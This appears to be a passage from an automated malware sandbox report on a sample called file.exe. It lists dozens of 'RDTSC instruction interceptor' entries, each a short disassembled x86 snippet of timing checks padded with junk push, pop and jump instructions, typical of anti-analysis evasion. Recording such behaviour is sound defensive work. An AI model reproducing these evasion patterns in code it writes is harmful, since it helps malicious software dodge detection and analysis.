Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8C50F second address: B8C523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B933D3 second address: B933DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF624B4E7D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B92655 second address: B92659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B92659 second address: B92662 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B93540 second address: B935A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c adc bl, FFFFFFD0h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d mov bx, CDE2h 0x00000021 mov eax, dword ptr [ebp+122D0DB5h] 0x00000027 pushad 0x00000028 cld 0x00000029 call 00007FF624C75306h 0x0000002e pop esi 0x0000002f popad 0x00000030 push FFFFFFFFh 0x00000032 push esi 0x00000033 pop ebx 0x00000034 nop 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FF624C75308h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B935A2 second address: B935B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2F22F second address: B2F233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9CCF6 second address: B9CD1A instructions: 0x00000000 rdtsc 0x00000002 je 00007FF624B4E7D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF624B4E7E0h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9CD1A second address: B9CD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9CD1E second address: B9CD22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9C636 second address: B9C649 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF624C752F6h 0x00000008 jng 00007FF624C752F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA0DE3 second address: BA0DFC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FF624B4E7DCh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA0DFC second address: BA0E0F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF624C752F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA0E0F second address: BA0E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA0E16 second address: BA0E20 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF624C752FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6B50 second address: BA6B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA62E8 second address: BA62FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF624C752F6h 0x0000000a pop eax 0x0000000b jl 00007FF624C752FCh 0x00000011 jbe 00007FF624C752F6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA62FF second address: BA6305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6305 second address: BA6311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6311 second address: BA6315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6315 second address: BA632D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75304h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA632D second address: BA6341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e ja 00007FF624B4E7D6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6341 second address: BA6349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6349 second address: BA634F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA634F second address: BA6353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6353 second address: BA6361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FF624B4E7D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6658 second address: BA6675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C75309h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA67F5 second address: BA67F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6964 second address: BA6978 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FF624C752FCh 0x0000000e ja 00007FF624C752F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAAA5E second address: BAAA7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAAA7D second address: BAAA81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAAA81 second address: BAAA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB35C3 second address: BB35F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF624C752F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007FF624C75300h 0x00000012 jo 00007FF624C752F8h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF624C752FBh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2392 second address: BB239B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB239B second address: BB239F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB24FA second address: BB2500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2500 second address: BB2504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2504 second address: BB251B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FF624B4E7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007FF624B4E7D6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB251B second address: BB251F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2823 second address: BB282B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB282B second address: BB2848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF624C752FDh 0x0000000b ja 00007FF624C752F6h 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2848 second address: BB285C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FF624B4E7DEh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB285C second address: BB2860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2E97 second address: BB2EA3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007FF624B4E7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2EA3 second address: BB2EAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF624C752F6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2EAF second address: BB2ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF624B4E7DDh 0x0000000f jno 00007FF624B4E7DAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75DA6 second address: B75DB2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75DB2 second address: B75E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7E7h 0x00000009 popad 0x0000000a jns 00007FF624B4E7DCh 0x00000010 popad 0x00000011 nop 0x00000012 pushad 0x00000013 mov dword ptr [ebp+122D199Bh], edi 0x00000019 mov ax, dx 0x0000001c popad 0x0000001d mov cx, 734Ch 0x00000021 lea eax, dword ptr [ebp+1247AADFh] 0x00000027 cmc 0x00000028 add edi, dword ptr [ebp+122D2E6Eh] 0x0000002e nop 0x0000002f jnp 00007FF624B4E7E0h 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75E03 second address: B75E16 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 ja 00007FF624C752F6h 0x0000000f pop edx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75EC7 second address: B75ECC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75ECC second address: B75ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75F82 second address: B75F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76298 second address: B762B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF624C75306h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B762B9 second address: B762BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B762BF second address: B762C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B762C3 second address: B762C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B764E8 second address: B76516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jc 00007FF624C752FEh 0x0000000d push ecx 0x0000000e jnl 00007FF624C752F6h 0x00000014 pop ecx 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push edi 0x0000001a pushad 0x0000001b jmp 00007FF624C75301h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76516 second address: B76529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 jg 00007FF624B4E7E0h 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76529 second address: B76537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76537 second address: B7653C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7670E second address: B76712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76712 second address: B76716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7686A second address: B76870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7710E second address: B77114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B77114 second address: B77122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B77122 second address: B77191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FF624B4E7D8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 jno 00007FF624B4E7DCh 0x00000028 lea eax, dword ptr [ebp+1247AB23h] 0x0000002e jmp 00007FF624B4E7DDh 0x00000033 nop 0x00000034 push ebx 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 pop edx 0x00000039 pop ebx 0x0000003a push eax 0x0000003b jp 00007FF624B4E7DEh 0x00000041 nop 0x00000042 mov cx, EEE3h 0x00000046 lea eax, dword ptr [ebp+1247AADFh] 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B77191 second address: B77195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B77195 second address: B7719B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7719B second address: B616BC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF624C752F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnl 00007FF624C752FAh 0x00000011 nop 0x00000012 mov edx, edi 0x00000014 call dword ptr [ebp+122D28B2h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF624C752FBh 0x00000021 jne 00007FF624C752FCh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2BB4A second address: B2BB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF624B4E7D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2BB54 second address: B2BB66 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF624C752F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FF624C752FCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6B69 second address: BB6B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6B71 second address: BB6B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6B75 second address: BB6B7B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6E86 second address: BB6E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6FEF second address: BB700C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7E9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB700C second address: BB7010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB7010 second address: BB7016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB7016 second address: BB703B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FF624C75302h 0x0000000c jng 00007FF624C752F6h 0x00000012 je 00007FF624C752F6h 0x00000018 ja 00007FF624C752F8h 0x0000001e pushad 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB703B second address: BB7063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF624B4E7E8h 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB7063 second address: BB706C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB706C second address: BB7076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF624B4E7D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB7076 second address: BB707A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB707A second address: BB7083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B616B8 second address: B616BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBBAB5 second address: BBBAC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF624B4E7D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBBAC0 second address: BBBACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBBC23 second address: BBBC2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBBC2A second address: BBBC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBC016 second address: BBC01C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBC01C second address: BBC020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBC020 second address: BBC02E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBC1A0 second address: BBC1A8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBC1A8 second address: BBC1B6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FF624B4E7D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBC5DA second address: BBC5DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBF6B2 second address: BBF6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
